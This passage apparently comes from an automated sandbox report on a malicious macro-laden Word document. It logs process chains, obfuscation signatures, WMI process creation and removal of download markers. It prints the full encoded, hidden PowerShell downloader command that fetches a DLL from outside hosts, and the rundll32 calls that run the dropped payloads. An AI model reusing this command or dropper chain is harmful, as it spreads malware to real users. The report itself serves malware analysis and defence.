JABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdarJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUKJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIUJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: N00048481397007.docStream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fiName: Gp0t5ucwnkng7fi
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_01FF100B push ss; iretd 7_2_01FF100C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024F090 push edx; ret 7_2_0024F237
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023057F push ss; iretd 7_2_00230580
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02042D98 push 02042E25h; ret 7_2_02042E1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201B274 push 0201B2CDh; ret 7_2_0201B2C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0202C34C push 0202C378h; ret 7_2_0202C370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02050020 push 02050058h; ret 7_2_02050050
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02044038 push 02044064h; ret 7_2_0204405C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201A0B2 push 0201A0E0h; ret 7_2_0201A0D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201A0B4 push 0201A0E0h; ret 7_2_0201A0D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02050654 push 02050680h; ret 7_2_02050678
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0205068C push 020506B8h; ret 7_2_020506B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201E696 push ecx; mov dword ptr [esp], edx7_2_0201E69C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020506C4 push 020506F0h; ret 7_2_020506E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201D6DC push 0201D751h; ret 7_2_0201D749
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201E6F0 push ecx; mov dword ptr [esp], edx7_2_0201E6F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02018748 push 02018774h; ret 7_2_0201876C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201E750 push ecx; mov dword ptr [esp], edx7_2_0201E754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201D754 push 0201D7ADh; ret 7_2_0201D7A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02018798 push 020187C4h; ret 7_2_020187BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020537A8 push 020537E0h; ret 7_2_020537D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020507E4 push 02050827h; ret 7_2_0205081F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201E450 push ecx; mov dword ptr [esp], edx7_2_0201E454
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02050498 push 020504EFh; ret 7_2_020504E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020504F4 push 0205055Ch; ret 7_2_02050554
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02050580 push 020505ACh; ret 7_2_020505A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0204B588 push 0204B5CAh; ret 7_2_0204B5C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020505B8 push 020505E4h; ret 7_2_020505DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_020505F0 push 0205063Ch; ret 7_2_02050634
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0201B5F8 push 0201B92Fh; ret 7_2_0201B927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0204CA20 push 0204CA58h; ret 7_2_0204CA50

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz:Zone.Identifier read attributes | deleteJump to behavior
